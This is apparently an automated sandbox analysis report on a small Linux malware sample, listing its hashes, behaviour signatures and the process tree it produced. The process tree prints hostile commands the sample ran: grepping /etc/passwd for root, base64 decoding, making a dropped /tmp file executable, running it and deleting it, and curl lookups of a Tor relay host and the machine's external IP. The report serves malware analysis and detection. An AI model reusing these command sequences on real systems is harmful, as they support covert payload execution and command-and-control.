Analysis

  • max time kernel
    149s
  • max time network
    132s
  • platform
    ubuntu-18.04_amd64
  • resource
    ubuntu1804-amd64-20240611-en
  • resource tags

    arch:amd64, arch:i386, image:ubuntu1804-amd64-20240611-en, kernel:4.15.0-213-generic, locale:en-us, os:ubuntu-18.04-amd64, system
  • submitted
    24/10/2024, 18:05

General

  • Target

    74accae8c7e0093939ab4e0cd1c2a7fd_JaffaCakes118

  • Size

    1KB

  • MD5

    74accae8c7e0093939ab4e0cd1c2a7fd

  • SHA1

    ae3b26988c72634e3f0daeb6486332530ba58324

  • SHA256

    d5b4d0376c9b07f5be237d0e47aa9aa321489917d30559328e544c5d0347e5ea

  • SHA512

    7e784dce4b2fa0f5a3659ccf7af43b3f4886bd5ea32acb26a60ccad38c5bc918789d7d01f2090bd3a053d783c6eba4571865f7e54de106232d83cae57e4172b9

Malware Config

Signatures

  • File and Directory Permissions Modification 1 TTPs 1 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Executes dropped EXE 1 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Deobfuscate/Decode Files or Information 1 TTPs 1 IoCs

    Adversaries may deobfuscate or decode files or information to evade detection mechanisms.

  • Reads runtime system information 2 IoCs

    Reads data from /proc virtual filesystem.

  • System Network Configuration Discovery 1 TTPs 1 IoCs

    Adversaries may gather information about the network configuration of a system.

  • Writes file to tmp directory 1 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/74accae8c7e0093939ab4e0cd1c2a7fd_JaffaCakes118
    /tmp/74accae8c7e0093939ab4e0cd1c2a7fd_JaffaCakes118
    1⤵
    PID:1494
      • /bin/bash
        bash
        2⤵
        • Writes file to tmp directory
        PID:1501
          • /usr/bin/cut
            cut -d: -f6
            3⤵
            PID:1505
          • /usr/bin/id
            id -u
            3⤵
            • Reads runtime system information
            PID:1507
          • /bin/grep
            grep x:0: /etc/passwd
            3⤵
            PID:1504
          • /usr/bin/head
            head -n 1 /tmp/.X11-unix/01
            3⤵
            PID:1510
          • /bin/ls
            ls /proc//status
            3⤵
            • Reads runtime system information
            PID:1511
          • /bin/chmod
            chmod +x ./i
            3⤵
            • File and Directory Permissions Modification
            PID:1512
          • /tmp/i
            ./i
            3⤵
            • Executes dropped EXE
            PID:1513
          • /bin/rm
            rm -f i
            3⤵
            PID:1514
          • /usr/bin/tr
            tr " " "\\n"
            3⤵
            PID:1519
          • /usr/bin/sort
            sort -uR
            3⤵
            PID:1521
          • /usr/bin/head
            head -n 1
            3⤵
            PID:1522
          • /bin/grep
            grep -Ev "[.]0"
            3⤵
            PID:1520
          • /bin/grep
            grep -oE "\\b([0-9]{1,3}\\.){3}[0-9]{1,3}\\b"
            3⤵
            PID:1518
          • /usr/bin/curl
            curl -4fsSLkA- -m200 "https://doh-fi.blahdns.com/dns-query?name=relay.tor2socks.in"
            3⤵
            PID:1517
          • /bin/uname
            uname -m
            3⤵
            PID:1524
          • /usr/bin/cut
            cut -f1 -d-
            3⤵
            PID:1528
          • /usr/bin/md5sum
            md5sum
            3⤵
            PID:1527
          • /bin/date
            date
            3⤵
            PID:1526
          • /usr/bin/curl
            curl -4fsSLk checkip.amazonaws.com
            3⤵
            • System Network Configuration Discovery
            PID:1530
      • /usr/bin/base64
        base64 -d
        2⤵
        • Deobfuscate/Decode Files or Information
        PID:1500

Network

MITRE ATT&CK Enterprise v15


Downloads

  • /tmp/i

    Filesize

    5B

    MD5

    f4b524261fce06c1fbd10b4681ad0b97

    SHA1

    c595d1a14f6aa42cc1aa7ab4416c39ada07ca89d

    SHA256

    9577a8bfed904bd55390ba203f1a233be1981b36fa945537eb3be5b2446de031

    SHA512

    ab280f109ee7dcfb8031e160d0235e9bfb72cabde44b21355d9e6db2873530d8537e3bdbb8faf6cd8d6b3eac33f58de7694201b93f277d0b587bf2534df14449